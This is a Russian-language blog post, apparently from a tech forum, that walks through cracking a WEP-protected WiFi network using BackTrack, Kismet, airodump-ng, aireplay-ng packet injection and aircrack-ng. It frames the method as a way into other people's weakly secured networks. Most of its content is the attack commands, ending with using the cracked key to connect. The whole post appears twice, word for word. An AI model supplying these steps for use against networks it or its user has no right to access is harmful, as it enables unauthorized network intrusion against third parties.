Security — Сеть с WEP - открытая сеть.
С распространением WiFi сетей остро встала проблема защиты их от несанкционированного доступа. Но, к сожалению, большинство (а именно те самые 95% людей) абсолютно не разбираются в данном вопросе и оставляют свою сеть практически открытой для доступа.
Сегодня я покажу уже довольно известный способ получить доступ к WiFi сети с WEP шифрованием.
Используется LiveCD Backtrack 4.0pre и утилиты Kismet и Aircrack-ng.
Для начала узнаем наш mac-адрес командой ifconfig
Итак, наш mac - 00:19:7e:8c:00:78. Запишите его где-нибудь, он нам пригодится.
Идем дальше, в консоли запускаем kismet. Если ругается на недоступность устройств для сканирования, то редактируем kismet.conf (строка ncsource) и запускаем снова.
Выбираем сеть с WEP шифрованием и записываем ее имя, bssid и канал
Закрываем Kismet и начинаем работать с пакетом Aircrack-NG
Запускаем airodump-ng:
airodump-ng --channel [сюда канал, на котором вещает сеть] --bssid [сюда bssid точки доступа] -w [куда писать дампы] [устройство, у меня это wlan0]
Открываем еще одно окно терминала или новую вкладку.
Запускаем aireplay-ng:
aireplay-ng -1 0 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]
И пытаемся установить соединение с точкой доступа. Как только оно получено, делаем:
aireplay-ng -3 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]
для закидывания точки пакетами.
Возвращаемся к airodump и смотрим как увеличивается число пакетов с данными. Для успешного подбора пароля нам необходимо собрать не менее 5-10 тысяч.
Далее открываем третий терминал и запускаем собственно сам подбор пароля.
aircrack-ng -z -с -b [bssid] [файлы дампов. например wepcrack*.cap]
Ждем... И ждем... Зависит от нагруженности точки и числа пойманных пакетов.
..На 74357181-й попытке- сервер согласился,что у него пароль "Мао Цзедун"
Пароль подобран:
Осталось только вписать его в ваш менеджер сетевых подключений.
При написании данного поста пострадали два бутерброда и один чайный пакетик.
P.S. Как я уже говорил раньше, я совершенно не умею обьяснять и писать инструкции.
Поэтому на все вопросы отвечу в комментариях и поправлю пост уже по ходу.
Сегодня я покажу уже довольно известный способ получить доступ к WiFi сети с WEP шифрованием.
Используется LiveCD Backtrack 4.0pre и утилиты Kismet и Aircrack-ng.
Для начала узнаем наш mac-адрес командой ifconfig
1 2 3 4 5 6 |
wlan0 Link encap:Ethernet HWaddr 00:19:7e:8c:00:78 |
Итак, наш mac - 00:19:7e:8c:00:78. Запишите его где-нибудь, он нам пригодится.
Идем дальше, в консоли запускаем kismet. Если ругается на недоступность устройств для сканирования, то редактируем kismet.conf (строка ncsource) и запускаем снова.
Выбираем сеть с WEP шифрованием и записываем ее имя, bssid и канал
Закрываем Kismet и начинаем работать с пакетом Aircrack-NG
Запускаем airodump-ng:
airodump-ng --channel [сюда канал, на котором вещает сеть] --bssid [сюда bssid точки доступа] -w [куда писать дампы] [устройство, у меня это wlan0]
Открываем еще одно окно терминала или новую вкладку.
Запускаем aireplay-ng:
aireplay-ng -1 0 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]
И пытаемся установить соединение с точкой доступа. Как только оно получено, делаем:
aireplay-ng -3 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]
для закидывания точки пакетами.
Возвращаемся к airodump и смотрим как увеличивается число пакетов с данными. Для успешного подбора пароля нам необходимо собрать не менее 5-10 тысяч.
Далее открываем третий терминал и запускаем собственно сам подбор пароля.
aircrack-ng -z -с -b [bssid] [файлы дампов. например wepcrack*.cap]
Ждем... И ждем... Зависит от нагруженности точки и числа пойманных пакетов.
..На 74357181-й попытке- сервер согласился,что у него пароль "Мао Цзедун"
Пароль подобран:
Осталось только вписать его в ваш менеджер сетевых подключений.
При написании данного поста пострадали два бутерброда и один чайный пакетик.
P.S. Как я уже говорил раньше, я совершенно не умею обьяснять и писать инструкции.
Поэтому на все вопросы отвечу в комментариях и поправлю пост уже по ходу.